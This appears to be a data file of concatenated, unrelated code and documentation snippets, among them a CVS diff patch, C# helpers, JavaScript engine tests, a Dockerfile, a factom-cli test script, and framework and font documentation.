self::KEY_DESCRIPTION_BACKGROUND_COLOR => 'be7575',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => 'a34a28',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '211717',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => 'fc7fb2',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '45454d',\n ],\n ];\n\n}" +"--- cvs-1.11.21/src/diff.c.old\t2005-05-27 19:17:03.000000000 +0200\n+++ cvs-1.11.21/src/diff.c\t2005-12-15 15:22:05.000000000 +0100\n@@ -955,14 +955,16 @@\n \t /* The first revision does not exist. If EMPTY_FILES is\n true, treat this as an added file. Otherwise, warn\n about the missing tag. */\n-\t if( use_rev2 == NULL || RCS_isdead( vers->srcfile, use_rev2 ) )\n+\t if( use_rev2 == NULL || RCS_isdead( vers->srcfile, use_rev2 ) ) {\n \t\t/* At least in the case where DIFF_REV1 and DIFF_REV2\n \t\t * are both numeric (and non-existant (NULL), as opposed to\n \t\t * dead?), we should be returning some kind of error (see\n \t\t * basicb-8a0 in testsuite). The symbolic case may be more\n \t\t * complicated.\n \t\t */\n-\t\treturn DIFF_SAME;\n+\t\terror (0, 0, \"no revision in file %s or missing file %s\", finfo->fullname, finfo->fullname);\n+\t\treturn DIFF_ERROR;\n+\t }\n \t if( empty_files )\n \t\treturn DIFF_ADDED;\n \t if( use_rev1 != NULL )" +"\ufeffusing System.Linq;\nusing Syncfusion.Windows.Forms.Tools;\n\nnamespace MW5.UI.Helpers\n{\n public static class TreeViewAdvHelper\n {\n public static int GetImageIndex(this TreeNodeAdv node)\n {\n return node.LeftImageIndices.Any() ? node.LeftImageIndices[0] : -1;\n }\n\n public static TreeNodeAdv CreateNode(this TreeNodeAdvCollection nodes, string key, string text, int imageIndex)\n {\n var node = new TreeNodeAdv(text)\n {\n LeftImageIndices = new[] { imageIndex },\n TagObject = key,\n };\n \n return node;\n }\n\n public static TreeNodeAdv Add(this TreeNodeAdvCollection nodes, string key, string text, int imageIndex)\n {\n var node = CreateNode(nodes, key, text, imageIndex);\n \n nodes.Add(node);\n\n return node;\n }\n\n public static TreeNodeAdv Find(this TreeNodeAdvCollection nodes, string key)\n {\n foreach (TreeNodeAdv n in nodes)\n {\n if (n.TagObject == null)\n {\n continue;\n }\n \n if ((string)n.TagObject == key)\n {\n return n;\n }\n }\n\n return null;\n }\n }\n}" +"Thank you for downloading Gregdumb's time-of-day skydome blueprint, version 1.4! Created with Unreal Engine 4.8 but tested up to 4.18.\r\n\r\nYou can use this work any way you want, commercial or not. I won't sue you if you don't credit me, but it would be nice if you did.\r\n\r\n\r\n//////////////////////////////\r\n\r\nInstallation Instructions:\r\n\r\n- Extract this archive;\r\n- Copy the \"Content\" folder into your project folder (it should merge with the content folder already there);\r\n- When it asks if you want to merge folders, say yes;\r\n- Launch UnrealEd, and load the project you copied that folder to;\r\n- Go to 'File > Open Level' and choose \"TimeOfDayTemplate.umap\" (it should be located under \\YourProject\\Content\\Maps);\r\n- Hit simulate, and watch the sun move!\r\n\r\n//////////////////////////////\r\n\r\n\r\nFor more information and details please visit https://gregbrisebois.com.\r\n\r\nContact me here: https://forums.unrealengine.com/member.php?179-gregdumb Please give me criticism and feedback!\r\n\r\n\r\nCreated by Greg Brisebois, with special thanks to Shoiko and lbraud." +"// IM has the following fastpaths:\n// - constant index (constant)\n// - need negative int check (neg)\n// - needs hole check (hole)\n// So to test everything we have to do:\n// constant | neg | hole\n// test 1: 0 0 0\n// test 2: 1 0 0\n// test 3: 0 1 0\n// test 4: 1 1 0\n// test 5: 0 0 1\n// test 6: 1 0 1\n// test 7: 0 1 1\n// test 8: 1 1 1\n\nfunction test1(index, a) {\n if (index < 0)\n index = -index\n return index in a;\n}\nassertEq(test1(1, [1,2]), true);\n\nfunction test2(a) {\n return 0 in a;\n}\nassertEq(test2([1,2]), true);\n\nfunction test3(index, a) {\n return index in a;\n}\n\nvar arr3 = [];\narr3[\"-1073741828\"] = 17;\nassertEq(test3(-1073741828, arr3), true);\n\nfunction test4(a) {\n return -1073741828 in a;\n}\nassertEq(test4(arr3), true);\n\n\nfunction test5(index, a) {\n if (index < 0)\n index = -index\n return index in a;\n}\nvar arr5 = [];\narr5[0] = 1\narr5[1] = 1\narr5[2] = 1\narr5[4] = 1\nassertEq(test5(1, arr5), true);\nassertEq(test5(3, arr5), false);\n\nfunction test7a(a) {\n return 3 in a;\n}\nfunction test7b(a) {\n return 4 in a;\n}\nassertEq(test7a(arr5)," +"C> \\ingroup nwdft\nC> @{\nC>\nC> \\file occup_input.F\nC> Read the occupation numbers\nC>\nC> @}\nC>\nC> \\ingroup nwdft\nC> @{\nC>\nC> \\brief Orbital occupations input reader\nC>\nC> Read the orbital occupation numbers either from the input or from\nC> a file. An example of the input block is\nC>\nC> \\code\nC> occup\nC> 5 3\nC> 1.0 1.0\nC> 1.0 1.0\nC> 1.0 1.0\nC> 1.0\nC> 1.0\nC> end\nC> \\endcode\nC>\nC> The first line with two integers specifies how many occupation\nC> numbers there are to read for each spin channel. Next there are\nC> a number of lines specifying the orbital occupations.\nC>\nC> Similary for reading the occupation numbers from a file\nC>\nC> \\code\nC> occup\nC> 5 3\nC> load file.occup\nC> end\nC> \\endcode\nC>\nC> After reading the occupation numbers they are stored on the \nC> runtime database in the fields:\nC>\nC> - `focc:occup_switch` -- there was an \"occup\" input block\nC>\nC> - `focc:occup` -- the number of alpha- and beta-occupation numbers\nC>\nC> - `focc:occup_list` -- the list of occupation numbers\nC>\nC> The occupation number list is stored essentially as read." +"\ufeffnamespace Rebus.Routing.TransportMessages\n{\n /// \n /// Options on how to handle exceptions when attempting to forward transport messages\n /// \n public enum ErrorBehavior\n {\n /// \n /// Indicates that no error handling should be done. This puts the burden of handling errors into the hands\n /// of the implementor of the transport message forwarding function, and thus it should handle errors by\n /// forwarding the message somewhere else\n /// \n RetryForever,\n\n /// \n /// Indicates that the transport message should be forwarded to the error queue in the event that there is an error.\n /// This is done in a \"fail fast\"-fashion, so there will be no additional delivery attempts.\n /// \n ForwardToErrorQueue\n }\n}" +"# Writing actions\n\n## What is an action?\n\nAn action is basically what a controller in an MVC architecture is. It is the glue that interacts with various services and other actions to achieve some business-specific task.\n\nUsing actions is optional (unless you are writing a component which you want other people to use), but they are a great place to put re-usable pieces of logic. You can then call your actions from an http server, or from a CLI interface or from an interactive REPL session. If you put all this logic into an http route handler, you would not be able to easily execute it from other places.\n\nSome common traits of an action:\n\n- They usually interact with many other components (like services or other actions)\n- They frequently contain business-specific logic or accomplish a very specific task\n- They do not need to keep any kind of state (they are stateless - it's just input params->returning results)\n\n> **NOTE**: Contrary to services and hooks, the Action class you implement **is** what you will interface with - when you register an Action into the Atlas instance, the class is instantiated and exposed to you via `atlas.actions.*`.\n\n##" +"% CVX: Matrix structure definitions and utilities.\n% CVX provides a keyword-based method for definiting matrices\n% with one or more types of structure; e.g.\n% variable X(n,n) symmetric toeplitz tridiagonal;\n% CVX automatically computes an efficient basis for the requested\n% structure. The files in this directory implement those computations.\n%\n% None of these files should be called directly---matrix structure is\n% selected in the VARIABLE declaration; see VARIABLE for more details.\n% Below are the keywords that are available, and the structures they\n% represent. Keywords can be freely combined (see the above example),\n% but of course some combinations are degenerate, yielding only the \n% all-zero matrix; e.g.,\n% variable X(n,n) \n%\n% Structures:\n% banded - (U,L)-banded matrices.\n% complex - Complex variables of all sizes.\n% diagonal - Diagonal matrices.\n% hankel - Hankel matrices.\n% hermitian - Complex Hermitian matrices.\n% lower_bidiagonal - Lower bidiagonal matrices.\n% lower_hessenberg - Lower Hessenberg matrices.\n% lower_triangular - Lower triangular matrices.\n% scaled_identity - Scaled identity: t*eye(n).\n% skew_symmetric - Skew-symmetric matrices.\n% sparse - Matrices with a fixed sparsity pattern.\n% symmetric - Symmetric matrices.\n% toeplitz - Toeplitz matrices.\n% tridiagonal - Tridiagional matrices." +"---\ntitle: System Props\n---\n\nimport {PropsList, COMMON, LAYOUT, BORDER, TYPOGRAPHY, FLEX, POSITION, GRID} from '../components'\n\nPrimer React components utilize what we call \"system props\" to apply a standard set of props to each component. Using [styled-system](https://github.com/jxnblk/styled-system), groups of props are automatically applied to each component. Most components get the `COMMON` set of props which give the component access to color and space props (margin, padding, color and background color). These groups correspond to the `color` and `space` functions from `styled-system` which can be referenced in the styled system [table of style functions](https://github.com/jxnblk/styled-system/blob/master/docs/table.md#core).\n\nTo check which system props each component includes, check the documentation for that component.\n\n### The `as` prop\nAll Primer React components have access to the `as` prop, provided by [styled-components](https://www.styled-components.com/docs/api#as-polymorphic-prop). We use the `as` prop to render a component with the styles of the passed component in `as`, but with the system props of the base component.\n\nFor example, if you wanted to add some flex utilities to the `Text` component, you could do:\n\n```jsx live\nHello!\n```\n\n\n### System Prop Categories\n\n| Category | Included Props | styled-system docs |\n|-----|--------|--------|\n| `COMMON`| | [styled-system core docs](https://github.com/jxnblk/styled-system/blob/master/docs/table.md#core) |\n| `TYPOGRAPHY`| |" +"---\ntitle: \"Knowing grids means breaking grids\"\nexcerpt: \"Exploring what it means to develop a grid system that helps facilitate strong design with purpose.\"\nlast_modified_at: 2013-04-26\nimage: \n path: &image /assets/images/knowing-grids-feature.jpg\n width: 1280\n height: 640\n feature: *image\ntwitter:\n card: summary_large_image\ncategories: [notes]\ntags: [design, inspiration]\nsupport: false\ntoc: true\n---\n\nOf all the things to grab my attention, the grid system used in a women's health calendar was certainly not high on my list.\n\nIt's a funny story that will probably make less sense after I describe this awful analogy, but here it goes. You ever do something for so long that you start seeing it creep up in random places? Back in 1997, after I got a Nintendo 64 and played *Super Mario* all night instead of working on my 3D design projects. I started getting these crazy ideas that I could triple jump over ponds or reach the top of buildings by doing a back flip like that mustachioed plumber.\n\nSitting in 2D design and typography classes for 4 years of my life had a similar effect. It was like having a magician expose all his secrets to me. Problem is, I can no longer take these tricks at" +"/* eslint-disable */\nconst data = [\n {\n \"author\": \"Arkadiy Pilguk(apilguk@gmail.com)\",\n \"license\": \"MIT\"\n },\n {\n \"name\": \"Downsample\",\n \"description\": \"Performance always important, but some algorythms is very expencive to be\\n applyed for original picture size. For this case we need try reduce image\\n size and then apply algorythm, tinycv support a few different ways to reduce\\n demention my meaning pizels or use it maximum value wich is known as MaxPooling\\n layer.\",\n \"examples\": [\n {\n \"title\": \"example\",\n \"description\": \"// this line reduces an input image in 3x\\n downsampleOp(inputImage, 3, 0);\"\n },\n {\n \"title\": \"example\",\n \"description\": \"// this line reduces an input image in 3x\\n downsampleOp(inputImage, 3, 0);\"\n }\n ],\n \"params\": [\n {\n \"name\": \"tSrc\",\n \"description\": \"The source image to be downsampled.\",\n \"type\": [\n {\n \"type\": \"Tensor\"\n }\n ],\n \"optional\": false\n },\n {\n \"name\": \"k\",\n \"description\": \"Downsampling coeficient.\",\n \"type\": [\n {\n \"type\": \"number\"\n }\n ],\n \"optional\": false\n },\n {\n \"name\": \"s\",\n \"description\": \"Downsampling support two possible variants of processing\\n pixels to be downsampled 0 - Max, 1 - Mean.\",\n \"type\": [\n {\n \"type\": \"number\"\n }\n ],\n \"optional\": false\n }\n ]\n }\n]\n\nexport default data;" +"/**\n * Provides classes representing Python classes.\n */\n\nimport python\n\n/**\n * An (artificial) expression corresponding to a class definition.\n * It is recommended to use `ClassDef` instead.\n */\nclass ClassExpr extends ClassExpr_ {\n /** Gets the metaclass expression */\n Expr getMetaClass() {\n if major_version() = 3\n then\n exists(Keyword metacls |\n this.getAKeyword() = metacls and\n metacls.getArg() = \"metaclass\" and\n result = metacls.getValue()\n )\n else\n exists(Assign a |\n a = this.getInnerScope().getAStmt() and\n a.getATarget().(Name).getId() = \"__metaclass__\" and\n result = a.getValue()\n )\n }\n\n /** Gets the nth keyword argument of this class definition. */\n override DictUnpackingOrKeyword getKeyword(int index) {\n result = this.getKeywords().getItem(index)\n }\n\n /** Gets a keyword argument of this class definition. */\n override DictUnpackingOrKeyword getAKeyword() { result = this.getKeywords().getAnItem() }\n\n override Expr getASubExpression() {\n result = this.getABase() or\n result = this.getAKeyword().getValue() or\n result = this.getKwargs() or\n result = this.getStarargs()\n }\n\n /** Gets a call corresponding to a decorator of this class definition. */\n Call getADecoratorCall() {\n result.getArg(0) = this or\n result.getArg(0) = this.getADecoratorCall()\n }\n\n /** Gets a decorator of this function expression */\n Expr getADecorator() { result = this.getADecoratorCall().getFunc() }\n\n override AstNode getAChildNode() {\n result = this.getASubExpression()\n or\n result = this.getInnerScope()\n }\n\n /** Gets a tuple (*) argument of this class definition." +"//! A map of all publicly exported items in a crate.\n\nuse std::{cmp::Ordering, fmt, hash::BuildHasherDefault, sync::Arc};\n\nuse base_db::CrateId;\nuse fst::{self, Streamer};\nuse indexmap::{map::Entry, IndexMap};\nuse rustc_hash::{FxHashMap, FxHasher};\nuse smallvec::SmallVec;\nuse syntax::SmolStr;\n\nuse crate::{\n db::DefDatabase,\n item_scope::ItemInNs,\n path::{ModPath, PathKind},\n visibility::Visibility,\n AssocItemId, ModuleDefId, ModuleId, TraitId,\n};\n\ntype FxIndexMap = IndexMap>;\n\n/// Item import details stored in the `ImportMap`.\n#[derive(Debug, Clone, Eq, PartialEq)]\npub struct ImportInfo {\n /// A path that can be used to import the item, relative to the crate's root.\n pub path: ModPath,\n /// The module containing this item.\n pub container: ModuleId,\n}\n\n/// A map from publicly exported items to the path needed to import/name them from a downstream\n/// crate.\n///\n/// Reexports of items are taken into account, ie. if something is exported under multiple\n/// names, the one with the shortest import path will be used.\n///\n/// Note that all paths are relative to the containing crate's root, so the crate name still needs\n/// to be prepended to the `ModPath` before the path is valid.\n#[derive(Default)]\npub struct ImportMap {\n map: FxIndexMap,\n\n /// List of keys stored in `map`, sorted lexicographically by their `ModPath`. Indexed by the\n /// values returned by" +"package methods;\n\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\nimport env.BaseTest;\n\npublic class ProgressMethods extends SelectElementByType implements BaseTest {\n /**\n * Method to wait\n *\n * @param time : String : Time to wait\n * @param method : String : wait by sleep or implicit method\n * @throws NumberFormatException\n * @throws InterruptedException\n */\n public void wait(String time) throws NumberFormatException, InterruptedException {\n // sleep method takes parameter in milliseconds\n Thread.sleep(Integer.parseInt(time) * 1000);\n }\n\n /**\n * Method to Explicitly wait for element to be enabled=click\n *\n * @param accessType : String : Locator type (id, name, class, xpath, css)\n * @param accessName : String : Locator value\n * @param duration : String : Time to wait for element to be clickable\n */\n public void waitForElementToClick(String accessType, String accessName, String duration) {\n final By byEle = getelementbytype(accessType, accessName);\n final WebDriverWait wait = new WebDriverWait(BaseTest.driver, Integer.parseInt(duration) * 1000);\n wait.until(ExpectedConditions.elementToBeClickable(byEle));\n }\n\n /**\n * Method to Explicitly wait for element to be displayed\n *\n * @param accessType : String : Locator type (id, name, class, xpath, css)\n * @param accessName : String : Locator value\n * @param duration : String : Time to wait for element to be displayed\n */\n public void waitForElementToDisplay(String accessType, String accessName, String" +"---\ntitle: Difference between Git and GitHub\nlocaleTitle: Diferencia entre Git y GitHub\n---\n## Diferencia entre Git y GitHub\n\nGit y Github son dos cosas diferentes. [Git](https://git-scm.com/) es el [sistema de control de versiones](https://en.wikipedia.org/wiki/Version_control) , mientras que [GitHub](https://github.com/) es un servicio para alojar repositorios de Git y ayudar a las personas a colaborar en la escritura de software. Sin embargo, a menudo se confunden por su nombre similar, debido al hecho de que GitHub se construye sobre Git, y porque muchos sitios web y art\u00edculos no hacen la diferencia entre ellos lo suficientemente clara.\n\n![Git no es GitHub](https://i.imgur.com/EkjwJdr.png)\n\n### Git\n\nGit es el sistema de control de versiones distribuido. Git es responsable de realizar un seguimiento de los cambios en el contenido, generalmente los archivos de c\u00f3digo fuente.\n\nPara m\u00e1s informaci\u00f3n, hay un [art\u00edculo completo sobre el propio Git](https://guide.freecodecamp.org/git) .\n\n### GitHub\n\nGitHub es una empresa que proporciona hosting de repositorio Git. Eso significa que proporcionan una soluci\u00f3n llave en mano para alojar repositorios Git en sus servidores. Eso puede ser \u00fatil para mantener una copia de seguridad de su repositorio (Git solo rastrea los cambios realizados en sus archivos a lo largo del tiempo, todav\u00eda se debe hacer" +"#\n# Step 1: Build sydent and install dependencies\n#\nFROM docker.io/python:3.8-alpine as builder\n\n# Install dev packages\nRUN apk add --no-cache \\\n build-base \\\n libressl-dev \\\n libffi-dev\n\n# Add user sydent\nRUN addgroup -S -g 993 sydent \\\n && adduser -D --home /sydent -S -u 993 -G sydent -s /bin/ash sydent \\\n && echo \"sydent:$(dd if=/dev/random bs=32 count=1 | base64)\" | chpasswd\n\n# Copy resources\nCOPY --chown=sydent:sydent [\"res\", \"/sydent/res\"]\nCOPY --chown=sydent:sydent [\"scripts\", \"/sydent/scripts\"]\nCOPY --chown=sydent:sydent [\"sydent\", \"/sydent/sydent\"]\nCOPY --chown=sydent:sydent [\"README.rst\", \"setup.cfg\", \"setup.py\", \"/sydent/\"]\n\n# Install dependencies\nRUN cd /sydent \\\n && su sydent -c 'pip install --user --upgrade pip setuptools sentry-sdk' \\\n && su sydent -c 'pip install --user -e .' \\\n && rm -rf /sydent/.cache \\\n && find /sydent -name '*.pyc' -delete\n\n#\n# Step 2: Reduce image size and layers\n#\n\nFROM docker.io/python:3.8-alpine\n\n# Install packages\nRUN apk add --no-cache \\\n libressl \\\n libffi\n\n# Add user sydent and create /data directory\nRUN addgroup -S -g 993 sydent \\\n && adduser -D --home /sydent -S -u 993 -G sydent -s /bin/ash sydent \\\n && echo \"sydent:$(dd if=/dev/random bs=32 count=1 | base64)\" | chpasswd \\\n && mkdir /data \\\n && chown sydent:sydent /data\n\n# Copy sydent\nCOPY --from=builder" +"---\ntitle: Component Manager\n---\n\n# Component Manager\n\nThe Component is a base element of the template. It might be something simple and atomic like an image or a text box, but also complex structures, more probably composed by other components, like sections or pages. The concept of the component was made to allow the developer to bind different behaviors to different elements. For example, opening the Asset Manager on double click of the image is a custom behavior binded to that particular type of element.\n\n::: warning\nThis guide is referring to GrapesJS v0.15.8 or higher\n:::\n\n[[toc]]\n\n\n\n\n\n## How Components work?\n\nLet's see in detail how components work by looking at all the steps from adding an HTML string to the editor.\n\n::: tip\nAll the following snippets can be run directly in console from the [main demo](https://grapesjs.com/demo.html)\n:::\n\nThis is how we can add new components to the canvas:\n\n```js\n// Append components directly to the canvas\neditor.addComponents(`
    \n \n Hello world!!!\n
    `);\n\n// or into some, already defined, component.\n// For instance, appending to a selected component would be:\neditor.getSelected().append(`
    ...`);\n\n// Actually, editor.addComponents is an alias of...\neditor.getWrapper().append(`
    ...`);\n```\n\n::: tip\nIf you need" +"package define\n\nconst (\n\t// HealthCheckHealthy describes a healthy container\n\tHealthCheckHealthy string = \"healthy\"\n\t// HealthCheckUnhealthy describes an unhealthy container\n\tHealthCheckUnhealthy string = \"unhealthy\"\n\t// HealthCheckStarting describes the time between when the container starts\n\t// and the start-period (time allowed for the container to start and application\n\t// to be running) expires.\n\tHealthCheckStarting string = \"starting\"\n)\n\n// HealthCheckStatus represents the current state of a container\ntype HealthCheckStatus int\n\nconst (\n\t// HealthCheckSuccess means the health worked\n\tHealthCheckSuccess HealthCheckStatus = iota\n\t// HealthCheckFailure means the health ran and failed\n\tHealthCheckFailure HealthCheckStatus = iota\n\t// HealthCheckContainerStopped means the health check cannot\n\t// be run because the container is stopped\n\tHealthCheckContainerStopped HealthCheckStatus = iota\n\t// HealthCheckContainerNotFound means the container could\n\t// not be found in local store\n\tHealthCheckContainerNotFound HealthCheckStatus = iota\n\t// HealthCheckNotDefined means the container has no health\n\t// check defined in it\n\tHealthCheckNotDefined HealthCheckStatus = iota\n\t// HealthCheckInternalError means some something failed obtaining or running\n\t// a given health check\n\tHealthCheckInternalError HealthCheckStatus = iota\n\t// HealthCheckDefined means the healthcheck was found on the container\n\tHealthCheckDefined HealthCheckStatus = iota\n)" +"\n console.debug \"AnalysisRequestAdd::load\"\n\n # load translations\n jarn.i18n.loadCatalog 'bika'\n @_ = window.jarn.i18n.MessageFactory('bika')\n\n # disable browser autocomplete\n $('input[type=text]').prop 'autocomplete', 'off'\n\n # storage for global Bika settings\n @global_settings = {}\n\n # services data snapshot from recalculate_records\n # returns a mapping of arnum -> services data\n @records_snapshot = {}\n\n # brain for already applied templates\n @applied_templates = {}\n\n # Remove the '.blurrable' class to avoid inline field validation\n $(\".blurrable\").removeClass(\"blurrable\")\n\n # bind the event handler to the elements\n @bind_eventhandler()\n\n # N.B.: The new AR Add form handles File fields like this:\n # - File fields can carry more than one field (see init_file_fields)\n # - All uploaded files are extracted and added as attachments to the new created AR\n # - The file field itself (Plone) will stay empty therefore\n @init_file_fields()\n\n # get the global settings on load\n @get_global_settings()\n\n # recalculate records on load (needed for AR copies)\n @recalculate_records()\n\n\n ### METHODS ###\n\n bind_eventhandler: =>\n ###\n * Binds callbacks on elements\n ###\n console.debug \"AnalysisRequestAdd::bind_eventhandler\"\n # Categories header clicked\n $(\".service-listing-header\").on \"click\", @on_service_listing_header_click\n # Category toggle button clicked\n $(\"tr.category\").on \"click\", @on_service_category_click\n # Save" +"---\ntitle: Recursion\n---\n\nThere are three places recursion is commonly used: bindings, types, and modules.\n\nFeature | Recursive | Non-recursive\n---------|---------------------|--------------\nBindings | `let rec fn = ...` | `let fn = ...`\nTypes | `type t = ...` | `type nonrec t = ...`\nModules | `module rec A ...` | `module A ...`\n\n## Recursive Bindings\n\nBy default the name of a binding is not available for use on the right side of\nthat binding. This applies to all `let` bindings, including function\ndefinitions. This behavior is required for\n[Binding Shadowing](let-binding.md#binding-shadowing) to work:\n\n```reason\nlet x = 10;\n/* If bindings were recursive by default this would form a cycle and break */\nlet x = x + 10;\n```\n\nThe natural way to write a recursive function will have an error:\n\n```reason\nlet infiniteRecursion = () => {\n /* Error: Unbound value infiniteRecursion */\n infiniteRecursion();\n};\n```\n\nOpt-in to a recursive binding using the `rec` keyword:\n\n```reason\nlet rec infiniteRecursion = () => {\n infiniteRecursion();\n};\n```\n\n## Mutual Recursion\n\nMutually recursive functions use the `and` keyword:\n\n```reason\nlet rec function1 = () => {\n function2();\n}\nand function2 = () => {\n function3();\n}\nand" +" 'Yao ', 'Yu ', 'Chong ', 'Xi ', 'Xi ', 'Jiu ', 'Yu ', 'Yu ', 'Xing ', 'Ju ', 'Jiu ', 'Xin ', 'She ', 'She ', 'Yadoru ', 'Jiu ',\n 0x10 => 'Shi ', 'Tan ', 'Shu ', 'Shi ', 'Tian ', 'Dan ', 'Pu ', 'Pu ', 'Guan ', 'Hua ', 'Tan ', 'Chuan ', 'Shun ', 'Xia ', 'Wu ', 'Zhou ',\n 0x20 => 'Dao ', 'Gang ', 'Shan ', 'Yi ', null, 'Pa ', 'Tai ', 'Fan ', 'Ban ', 'Chuan ', 'Hang ', 'Fang ', 'Ban ', 'Que ', 'Hesaki ', 'Zhong ',\n 0x30 => 'Jian ', 'Cang ', 'Ling ', 'Zhu ', 'Ze ', 'Duo ', 'Bo ', 'Xian ', 'Ge ', 'Chuan ', 'Jia ', 'Lu ', 'Hong ', 'Pang ', 'Xi ', null,\n 0x40 => 'Fu ', 'Zao ', 'Feng ', 'Li ', 'Shao ', 'Yu ', 'Lang ', 'Ting ', null, 'Wei ', 'Bo ', 'Meng ', 'Nian ', 'Ju ', 'Huang ', 'Shou ',\n 0x50 => 'Zong ', 'Bian ', 'Mao ', 'Die ', null, 'Bang ', 'Cha ', 'Yi ', 'Sao ', 'Cang ', 'Cao ', 'Lou ', 'Dai ', 'Sori '," +"#!/usr/bin/env bash\n\n#!/bin/bash\n\nnchains=20 # number of chains to create\nnentries=0 # number of entries to add to each chain\n\nfa1=$(factom-cli importaddress Fs3E9gV6DXsYzf7Fqx1fVBQPQXV695eP3k5XbmHEZVRLkMdD9qCK)\n\nec1=$(factom-cli importaddress Es3LB2YW9bpdWmMnNQYb31kyPzqnecsNqmg5W4K7FKp4UP6omRTa)\n\necho \"Buying\" 1000 $fa1 $ec1\nfactom-cli buyec $fa1 $ec1 100\nsleep 5s\n\naddentries() {\n # create a random datafile\n\tdatalen=$(shuf -i 100-9900 -n 1)\n\tdatafile=$(mktemp)\n\tbase64 /dev/urandom | head -c $datalen > $datafile\n\n\techo \"Entry Length \" $datalen \" bytes, file name: \" $datafile\n\n\tlet y=$(shuf -i 30-120 -n 1)\n\techo \"sleep\" $y \" seconds before writing entries\"\n\tsleep $y\n\tfor ((i=0; i\r\n /// Unlike forms that have a disposable life cycle with a clear chain of ownership, or purely managed\r\n /// libraries that have in a built in reference counting system, disposable members in DotSpatial\r\n /// require the ability to behave in some cases like a layer that should be removed from memory\r\n /// as soon as it is removed from the map, and other times like a persistent object. The DisposeLock\r\n /// concept works like an industrial lock-out system. Each additional lock increases the lock count.\r\n /// When all users have released the lock, the IsDisposedLocked property will be false, and the next\r\n /// action like a removal from the parent layers will properly dispose the item. Users may feel free\r\n /// to add the lock in order to handle disposal on the layers themselves. These methods will not\r\n /// actually prevent Dispose from functioning, but understand that calling dispose when there is an\r\n /// IsDisposeLocked is true means that there will likely be a problem.\r\n /// \r\n public interface IDisposeLock" +".. algorithm::\n\n.. summary::\n\n.. relatedalgorithms::\n\n.. properties::\n\nDescription\n-----------\n\nGiven an initial UB at some goniometer configuration, this algorithm facilitates\nthe 'linking' of the UBs across orientations - in other words, ensuring the\ncontinuity of the indexing of reflections throughout reciprocal space allowing\nfor grouping of reflections and refinement.\n\nOn chopper instruments, when the sample is lowered into the\nblockhouse there is often no possibility to adjust its position. When rotating the\ncrystal via the goniometer, since the crystal is likely not centred exactly, the\npredicted peaks from the initial UB often do not capture the data. As well as \nconsistently indexing the peaks, the algorithm also effectively carries out a U\nmatrix correction that accounts for sample miscentering. Use of this algorithm \nwill result in a seperate UB matrix for each orientation which can then be used \nfor integration. \n\nThe algorithm requires a set of predicted peaks that have been generated from\nthe initial UB via goniometer rotation, a set of observed (found) peaks, and\nthe lattice parameters in order to calculate the B matrix. A search within a\nQ-envelope is carried out in which all peaks within the envelope are screened\nas potential 'matches' to the observed" +"// Utilies for testing\n\nvar assert = require('assert');\nvar Buffer = require('buffer').Buffer;\nvar EventEmitter = require('events').EventEmitter;\nvar strtok = require('../lib/strtok');\nvar sys = require('sys');\n\n// A mock stream implementation that breaks up provided data into\n// random-sized chunks and emits 'data' events. This is used to simulate\n// data arriving with arbitrary packet boundaries.\nvar SourceStream = function(str, min, max) {\n EventEmitter.call(this);\n\n str = str || '';\n min = min || 1;\n max = max || str.length;\n\n var self = this;\n var buf = new Buffer(str, 'binary');\n\n var emitData = function() {\n var len = Math.min(\n min + Math.floor(Math.random() * (max - min)),\n buf.length\n );\n\n var b = buf.slice(0, len);\n\n if (len < buf.length) {\n buf = buf.slice(len, buf.length);\n process.nextTick(emitData);\n } else {\n process.nextTick(function() {\n self.emit('end')\n });\n }\n\n self.emit('data', b);\n };\n\n process.nextTick(emitData);\n};\nsys.inherits(SourceStream, EventEmitter);\nexports.SourceStream = SourceStream;\n\n// Stream to accept write() calls and track them in its own buffer rather\n// than dumping them to a file descriptor\nvar SinkStream = function(bufSz) {\n var self = this;\n\n bufSz = bufSz || 1024;\n var buf = new Buffer(bufSz);\n var bufOffset = 0;\n\n self.write = function() {\n var bl = (typeof arguments[0] === 'string') ?\n Buffer.byteLength(arguments[0], arguments[1]) :\n arguments[0].length;\n\n if" +"

    \nRadley is based on lettering originally drawn and designed for woodcarved titling work.\nIt was later digitized and extended to be used on the web.\nRadley is a practical face, based on letterforms used by hand carvers who cut letters quickly, efficiently, and with style.\nIt can be used for both titling and text typography.\n

    \n

    \nThe basic letterforms in Radley grew out of sketching and designing directly into wood with traditional carving chisels.\nThese were scanned and traced into FontForge and cleaned up digitally, then the character set was expanded.\nThere is something unique about carving letters into wood with traditional hand tools, and hopefully Radley carries some of the original spirit of these hand carved letterforms.\n

    \n

    \nSince the initial launch in 2012, Radley was updated by Vernon Adams adding an Italic and support for more Latin languages.\nHe made many glyph refinements throughout the family based on user feedback.\nIn 2017 the family was updated by Marc Foley to complete the work started by Vernon.\n

    \n

    \nTo contribute, see github.com/googlefonts/RadleyFont\n

    " +"\ufeffusing System;\nusing System.Collections.Generic;\nusing System.ComponentModel.Composition;\nusing System.Globalization;\nusing MadsKristensen.EditorExtensions.Settings;\nusing Microsoft.CSS.Core;\nusing Microsoft.VisualStudio.Utilities;\nusing Microsoft.CSS.Core.Checker;\nusing Microsoft.CSS.Core.Parser;\nusing Microsoft.CSS.Core.TreeItems.Selectors;\n\nnamespace MadsKristensen.EditorExtensions.Css\n{\n [Export(typeof(ICssItemChecker))]\n [Name(\"StarSelectorErrorTagProvider\")]\n [Order(After = \"Default Declaration\")]\n internal class StarSelectorErrorTagProvider : ICssItemChecker\n {\n public ItemCheckResult CheckItem(ParseItem item, ICssCheckerContext context)\n {\n SimpleSelector sel = (SimpleSelector)item;\n\n if (!WESettings.Instance.Css.ValidateStarSelector || !sel.IsValid || context == null)\n return ItemCheckResult.Continue;\n\n if (sel.Text == \"*\")\n {\n //string afterStar = sel.Text.Length > index + 1 ? sel.Text.Substring(index + 1) : null;\n //if (afterStar == null || !afterStar.Trim().StartsWith(\"html\", StringComparison.OrdinalIgnoreCase))\n //{\n string errorMessage = string.Format(CultureInfo.InvariantCulture, Resources.PerformanceDontUseStarSelector);\n\n SimpleErrorTag tag = new SimpleErrorTag(sel, errorMessage);\n\n context.AddError(tag);\n //}\n }\n\n return ItemCheckResult.Continue;\n }\n\n\n public IEnumerable ItemTypes\n {\n get { return new[] { typeof(SimpleSelector) }; }\n }\n }\n}" +"@charset \"UTF-8\";\n/// Creates a grid column of requested size.\n///\n/// @group features\n///\n/// @name Grid 